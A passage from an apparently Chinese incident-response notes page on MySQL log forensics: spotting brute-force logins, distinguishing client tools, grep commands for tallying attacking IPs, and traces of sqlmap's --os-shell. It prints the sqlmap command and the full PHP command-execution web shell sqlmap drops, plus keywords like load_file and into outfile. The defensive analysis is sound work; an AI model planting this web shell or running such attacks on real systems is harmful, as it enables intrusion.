          103 Connect    Access denied for user &#39;mysql&#39;@&#39;192.168.204.1&#39; (using password: YES)
          104 Connect    mysql@192.168.204.1 on 
          104 Connect    Access denied for user &#39;mysql&#39;@&#39;192.168.204.1&#39; (using password: YES)
          100 Connect    root@192.168.204.1 on 
          101 Connect    root@192.168.204.1 on 
          101 Connect    Access denied for user &#39;root&#39;@&#39;192.168.204.1&#39; (using password: YES)
           99 Connect    root@192.168.204.1 on 
           99 Connect    Access denied for user &#39;root&#39;@&#39;192.168.204.1&#39; (using password: YES)
          105 Connect    mysql@192.168.204.1 on 
          105 Connect    Access denied for user &#39;mysql&#39;@&#39;192.168.204.1&#39; (using password: YES)
          100 Query    set autocommit=0
          102 Connect    mysql@192.168.204.1 on 
          102 Connect    Access denied for user &#39;mysql&#39;@&#39;192.168.204.1&#39; (using password: YES)
          100 Quit    `
</code></pre></div>
<p>你知道在这个口令猜解过程中，哪个是成功的吗？</p>
<p>利用爆破工具，一个口令猜解成功的记录是这样子的：</p>
<div class="highlight"><pre><span></span><code>190601 22:03:20     100 Connect    root@192.168.204.1 on 
       100 Query    set autocommit=0
       100 Quit
</code></pre></div>
<p>但是，如果你是用其他方式，可能会有一点点不一样的哦。</p>
<p>Navicat for MySQL登录：</p>
<div class="highlight"><pre><span></span><code>190601 22:14:07      106 Connect    root@192.168.204.1 on 
                 106 Query    SET NAMES utf8
                 106 Query    SHOW VARIABLES LIKE &#39;lower_case_%&#39;
                 106 Query    SHOW VARIABLES LIKE &#39;profiling&#39;
                 106 Query    SHOW DATABASES
</code></pre></div>
<p>命令行登录：</p>
<div class="highlight"><pre><span></span><code>190601 22:17:25      111 Connect    root@localhost on 
                 111 Query    select @@version_comment limit 1
190601 22:17:56      111 Quit
</code></pre></div>
<p>这个差别在于，不同的数据库连接工具，它在连接数据库初始化的过程中是不同的。通过这样的差别，我们可以简单判断出用户是通过连接数据库的方式。</p>
<p>另外，不管你是爆破工具、Navicat for MySQL、还是命令行，登录失败都是一样的记录。</p>
<p>登录失败的记录：</p>
<div class="highlight"><pre><span></span><code>102 Connect    mysql@192.168.204.1 on 
102 Connect    Access denied for user &#39;mysql&#39;@&#39;192.168.204.1&#39; (using password: YES)
</code></pre></div>
<p>利用shell命令进行简单的分析：</p>
<div class="highlight"><pre><span></span><code>#有哪些IP在爆破？
grep  &quot;Access denied&quot; mysql.log |cut -d &quot;&#39;&quot; -f4|uniq -c|sort -nr
     27 192.168.204.1

#爆破用户名字典都有哪些？
grep  &quot;Access denied&quot; mysql.log |cut -d &quot;&#39;&quot; -f2|uniq -c|sort -nr
     13 mysql
     12 root
      1 root
      1 mysql
</code></pre></div>
<p>在日志分析中，特别需要注意一些敏感的操作行为，比如删表、备库，读写文件等。关键词：drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。</p>
<p>敏感数据库表：SELECT <em>from mysql.user、SELECT</em> from mysql.func</p>
<h3 id="0x03-sql">0x03 SQL注入入侵痕迹<a class="headerlink" href="#0x03-sql" title="Permanent link">&para;</a></h3>
<p>在利用SQL注入漏洞的过程中，我们会尝试利用sqlmap的--os-shell参数取得shell，如操作不慎，可能留下一些sqlmap创建的临时表和自定义函数。我们先来看一下sqlmap os-shell参数的用法以及原理：</p>
<p>1、构造一个SQL注入点，开启Burp监听8080端口</p>
<div class="highlight"><pre><span></span><code>sqlmap.py -u http://192.168.204.164/sql.php?id=1 --os-shell --proxy=http://127.0.0.1:8080
</code></pre></div>
<p>HTTP通讯过程如下：</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-5-3.png" /></p>
<p>创建了一个临时文件tmpbwyov.php，通过访问这个木马执行系统命令，并返回到页面展示。</p>
<p>tmpbwyov.php：</p>
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "

<div class="highlight"><pre><span></span><code>&quot;.$w.&quot;
</code></pre></div>

";?>
<p>`</p>
<p>创建了一个临时表sqlmapoutput，调用存储过程执行系统命令将数据写入临时表，然后取临时表中的数据展示到前端。</p>
<p>通过查看网站目录中最近新建的可疑文件，可以判断是否发生过sql注入漏洞攻击事件。</p>
<p>检查方法：</p>
<p>1、检查网站目录下，是否存在一些木马文件：</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-5-4.png" /></p>
<p>2、检查是否有UDF提权、MOF提权痕迹</p>
<p>检查目录是否有异常文件</p>
<p>mysql\lib\plugin</p>
<p>c:/windows/system32/wbem/mof/</p>
<p>检查函数是否删除</p>
<div class="highlight"><pre><span></span><code>select * from mysql.func
</code></pre></div>
<p>3、结合web日志分析。</p>

  <hr>
<div class="md-source-file">
  <small>
    
      最后更新:
      <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_datetime">2022-02-05 21:07:01</span>
      
    
  </small>
</div>

              
            </article>
          </div>
        </div>
        
          <a href="#" class="md-top md-icon" data-md-component="top" data-md-state="hidden">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12z"/></svg>
            回到页面顶部
          </a>
        
      </main>
      
        <footer class="md-footer">
  
    <nav class="md-footer__inner md-grid" aria-label="页脚">
      
        
        <a href="../%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" class="md-footer__link md-footer__link--prev" aria-label="上一页: 应急响应" rel="prev">
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
          </div>
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                上一页
              </span>
              应急响应
            </div>
          </div>
        </a>
      
      
        
        <a href="../../about/aboutme/" class="md-footer__link md-footer__link--next" aria-label="下一页: about me" rel="next">
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                下一页
              </span>
              about me
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
          </div>
        </a>
      
    </nav>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
    <div class="md-copyright__highlight">
      Copyright &copy; 2017 - 2022
    </div>
  
  <a >keep learning ，stay foolish ，continue thinking</a>
  
</div>
      
        <div class="md-social">
  
    
    
    <a href="https://github.com/klsfct" target="_blank" rel="noopener" title="圆周 on github" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    <script id="__config" type="application/json">{"base": "../..", "features": ["navigation.instant", "navigation.tracking", "navigation.tabs", "navigation.sections", "navigation.expand", "navigation.indexes", "navigation.top", "header.autohide"], "translations": {"clipboard.copy": "\u590d\u5236", "clipboard.copied": "\u5df2\u590d\u5236", "search.config.lang": "ja", "search.config.pipeline": "trimmer, stemmer", "search.config.separator": "[\\uff0c\\u3002]+", "search.placeholder": "\u641c\u7d22", "search.result.placeholder": "\u952e\u5165\u4ee5\u5f00\u59cb\u641c\u7d22", "search.result.none": "\u6ca1\u6709\u627e\u5230\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.one": "\u627e\u5230 1 \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.other": "# \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.more.one": "\u5728\u8be5\u9875\u4e0a\u8fd8\u6709 1 \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.more.other": "\u5728\u8be5\u9875\u4e0a\u8fd8\u6709 # \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.term.missing": "\u7f3a\u5c11", "select.version.title": "\u9009\u62e9\u5f53\u524d\u7248\u672c"}, "search": "../../assets/javascripts/workers/search.22074ed6.min.js"}</script>
    
    
      <script src="../../assets/javascripts/bundle.960e086b.min.js"></script>
      
        <script src="../../js/baidu-tongji.js"></script>
      
    
  </body>
</html>